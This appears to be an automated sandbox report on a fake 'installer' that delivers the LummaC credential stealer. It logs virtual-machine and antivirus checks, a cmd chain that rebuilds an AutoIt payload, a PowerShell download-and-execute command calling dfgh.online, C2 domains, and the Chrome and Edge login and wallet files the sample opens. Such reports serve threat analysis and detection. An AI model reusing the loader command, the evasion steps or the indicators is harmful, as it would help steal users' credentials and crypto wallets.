Source: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3951			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1151			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-L8FKG.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-L8FKG.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7J1HK.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7J1HK.tmp\_isetup\_isdecmp.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp

API coverage: 0.0 %

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com TID: 8068	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1780	Thread sleep count: 3951 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2008	Thread sleep count: 1151 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2312	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2736	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000002.2503434885.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ye$
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000002.2503434885.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y}+
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2908841022.0000000000B23000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000011.00000002.2322740264.0000000007788000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Pens.com, 0000000C.00000003.2071677589.0000000004841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: Pens.com, 0000000C.00000003.2071677589.0000000004841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: Pens.com, 0000000C.00000003.2071677589.0000000004841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: Pens.com, 0000000C.00000003.2071677589.0000000004841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: Pens.com, 0000000C.00000003.2071677589.0000000004841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: Pens.com, 0000000C.00000003.2071677589.0000000004841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: Pens.com, 0000000C.00000003.2071677589.0000000004841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: Pens.com, 0000000C.00000003.2071677589.0000000004841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: Pens.com, 0000000C.00000003.2071677589.0000000004841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: imbibelubmbe.click

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Counts Counts.cmd & Counts.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 373155	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E French	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "rangers" Tender	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 373155\Pens.com + Limited + Guardian + Stationery + Checklist + Draft + Acids + Norway + Cord + Within + N + Nv 373155\Pens.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Comparing + ..\Void + ..\Hobby + ..\Death + ..\You + ..\Happen + ..\Fusion a	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com Pens.com a	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe "C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe" /VERYSILENT	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;			Jump to behavior

Source: extrac32.exe, 00000008.00000003.1689375183.00000000065E8000.00000004.00000020.00020000.00000000.sdmp, Pens.com, 0000000C.00000000.1699107710.0000000000143000.00000002.00000001.01000000.00000008.sdmp, N.8.dr, Pens.com.1.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: BrightLib.exe, 00000032.00000002.2907992424.000000000049A000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidclassgroup%s%uProgram Manager\P{Xps}\H\P{Xan}\P{Lu}\P{Ll}\P{L}\p{Xps}\h\p{Xan}\p{Lu}\p{Ll}\p{L}\p{Xwd}\P{Xwd}\p{Xsp}\P{Xsp}\p{Nd}\P{Nd}Error text not found (please report)Q\E{0,DEFINEUTF8)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressioninternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: BrightLib.exe, 00000032.00000002.2907992424.000000000049A000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: regk-hookm-hook2-hooksjoypollPART(no)%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUP...%s[%Iu of %Iu]: %-1.60s%sHKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYMasterSpeakersHeadphonesDigitalLineMicrophoneSynthCDTelephonePCSpeakerWaveAuxAnalogVolVolumeOnOffMuteMonoLoudnessStereoEnhBassBoostPanQSoundPanBassTrebleEqualizerRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDefaultIconNoIconDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe.aut%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: find.exe, 00000029.00000002.2864363631.0000018D3C7A0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: avgui.exe

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
